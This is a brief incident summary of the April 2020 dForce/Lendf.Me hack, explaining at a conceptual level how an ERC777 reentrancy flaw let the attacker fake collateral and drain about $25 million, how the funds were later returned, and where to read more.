dForce

dForce / Lendf.Me Hack — April 19, 2020

Attack Overview

On April 19, 2020, Lendf.Me, the lending protocol in the dForce network, was attacked and approximately $25 million in assets were drained from the contract. Lendf.Me was hit hardest, with 99.95% of funds or $24.5 million stolen.

Technical Vulnerability

The hackers utilized a vulnerability with the combination of using ERC777 tokens and DeFi smart contracts to execute a reentrancy attack. The callback mechanism enabled the hacker to supply and withdraw ERC777 tokens repeatedly before the balance was updated.

More specifically, the hacker exploited a reentrancy vulnerability in order to manipulate Lendf.Me's internal record of the hacker's collateral. After the hacker created this false collateral record, the hacker withdrew nearly all stablecoins, synthetic BTC, and wETH from the platform.

Root Cause

The hack took place after dForce allowed imBTC, a synthetic Bitcoin asset following the ERC777 standard, to be used as collateral on Lendf.Me. When Lendf.Me enabled the use of imBTC as collateral, the enabled ERC777 callback notification made Lendf.Me vulnerable to reentrancy attacks. This vulnerability allowed the attacker to create a false record of imBTC collateral within the Lendf.Me system.

Response

After receiving pressure from the authorities and dForce, the hacker returned nearly all funds. dForce created an asset redistribution plan in order to return assets to affected users.

Additional Sources

• https://decrypt.co/26033/dforce-lendfme-defi-hack-25m

• https://www.theblock.co/linked/62346/multicoin-capital-backed-defi-protocol-dforce-loses-25m-total-locked-value-in-an-exploit

• https://www.coindesk.com/markets/2020/04/19/weekend-attack-drains-decentralized-protocol-dforce-of-25m-in-crypto

• https://quantstamp.com/blog/how-the-dforce-hacker-used-reentrancy-to-steal-25-million

• https://unchainedcrypto.com/haseeb-qureshi-on-the-unbelievable-story-of-the-25-million-lendf-me-hack/